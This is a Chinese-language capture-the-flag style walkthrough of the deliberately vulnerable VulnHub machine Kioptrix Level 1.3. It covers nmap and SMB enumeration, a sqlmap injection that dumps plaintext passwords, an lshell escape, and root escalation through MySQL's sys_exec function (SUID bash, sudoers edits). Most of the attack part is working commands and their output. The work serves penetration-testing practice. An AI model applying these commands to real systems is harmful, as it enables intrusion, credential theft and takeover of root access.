KIOPTRIX: LEVEL 1.3-VulnHub靶机学习第五篇

 写在前面：前人栽树后人乘凉，谢谢网上各位大佬的解题思路作为参考学习；

一、实验准备

        1、实验地址：Kioptrix: Level 1.3 (#4) ~ VulnHub

        2、下载之后，本地解压，用VMware运行该虚拟机；

        

        3、设置Kioptrix Level 1.3与攻击机网络环境，保证在同一局域网；  

                          

        4、本实验攻击机使用的是Kali Linux，IP地址：10.10.10.131

二、情报收集

┌──(rootkali)-[~]
└─# nmap -sP 10.10.10.0/24         
Nmap scan report for 10.10.10.149 (10.10.10.149)
Host is up (0.00036s latency).
MAC Address: 00:0C:29:AE:CA:8A (VMware)
                                                                                                             
┌──(rootkali)-[~]
└─# nmap -sV -p1-65535 10.10.10.149     

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:AE:CA:8A (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

        1、smb探测

msf6 auxiliary(scanner/smb/smb_enumusers) > run

[+] 10.10.10.149:139      - KIOPTRIX4 [ nobody, robert, root, john, loneferret ] ( LockoutTries=0 PasswordMin=5 )
[*] 10.10.10.149:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

        - 版本：Samba 3.0.28a；

        - 用户：robert,root,john,loneferret；

        2、80端口访问

        

        

        

         - checklogin.php处POST参数有注入漏洞；

        - 万能密码无效；

        3、目录扫描

┌──(rootkali)-[~]
└─# dirsearch -u "10.10.10.149" -e php                                                                                                                                                                                            

[07:59:07] 200 -  109B  - /checklogin                                       
[07:59:07] 200 -  109B  - /checklogin.php                                   
[07:59:08] 200 -  298B  - /database.sql                                     
[07:59:11] 200 -  931B  - /images/                                                   
[07:59:12] 200 -    1KB - /index.php                                        
[07:59:12] 200 -    1KB - /index                                            
[07:59:12] 200 -    1KB - /index.php/login/      

        

         - 访问database.sql页面，获得john账密，测试无效；

        4、sqlmap

┌──(rootkali)-[/tmp/Kioptrix_Level_4]
└─# sqlmap -u "http://10.10.10.149/checklogin.php" --data "myusername=john&mypassword=123&Submit=Login" --batch -D members -T members -C id,password,username --dump

Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password              | username |
+----+-----------------------+----------+
| 1  | MyNameIsJohn          | john     |
| 2  | ADGAdsafdfwt4gadfga== | robert   |
+----+-----------------------+----------+

--------------------------------------------------------------------------------
[08:32:02] [WARNING] no clear password(s) found                                                                                                                                                                                      
Database: mysql
Table: user
[6 entries]
+------------------+-------------------------------------------+
| User             | Password                                  |
+------------------+-------------------------------------------+
| debian-sys-maint | *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879 |
| root             |                                    |
+------------------+-------------------------------------------+

        - 尝试登陆80后台，无可用信息，直接ssh远程访问；

       - ssh登陆后的权限如下图所示；

        

 三、渗透测试

        1、尝试提权

robert:~$ echo os.system('/bin/bash')
# lshell逃逸方法，百度得；
robert@Kioptrix4:~$ whoami 
robert

robert@Kioptrix4:~$ find / -perm -u+s -type f 2>/dev/null
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
... ...
# 疏忽或没找到可以提权的方式；

robert@Kioptrix4:~$ sudo su -
[sudo] password for robert: 

Sorry, try again.
[sudo] password for robert: 
robert is not in the sudoers file.  This incident will be reported.

         - 记得mysql是root无密码，尝试mysql提权；

robert@Kioptrix4:~$ mysql -uroot -e "select * from mysql.func"
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function | 
| sys_exec              |   0 | lib_mysqludf_sys.so | function | 
+-----------------------+-----+---------------------+----------+
# sys_exec函数可以执行系统命令；
robert@Kioptrix4:~$ mysql -uroot -e "select sys_exec('chmod u+s /bin/bash')"
# -e选项是“执行命令并退出”；
# u+s给用户赋予suid权限；
+---------------------------------+
| sys_exec('chmod u+s /bin/bash') |
+---------------------------------+
| NULL                            | 
+---------------------------------+
robert@Kioptrix4:~$ bash -p
# 如果后面接的命令为bash的外部命令，会显示这个外部命令的路径名； 没搞懂存在的意义；                                              
bash-3.2# whoami
root

        - bash -p这个命令，个人不是很理解，希望有大佬解惑；

        - 不过，通过实验可知，单纯的bash命令，并不会切换到root用户；

        

        2、Mysql提权的其他命令

john@Kioptrix4:~$ mysql -uroot -e "select sys_exec('usermod -aG admin john')"
# 将john用户添加到admin组里面-a=add；-G更改组；
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
john@Kioptrix4:~$ sudo su -                                                    
root@Kioptrix4:~# 

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ mysql -uroot       

mysql> select sys_exec('echo "john ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers');
+-----------------------------------------------------------------+
| sys_exec('echo "john ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers') |
+-----------------------------------------------------------------+
| NULL                                                            | 
+-----------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
john@Kioptrix4:~$ sudo su -
root@Kioptrix4:~#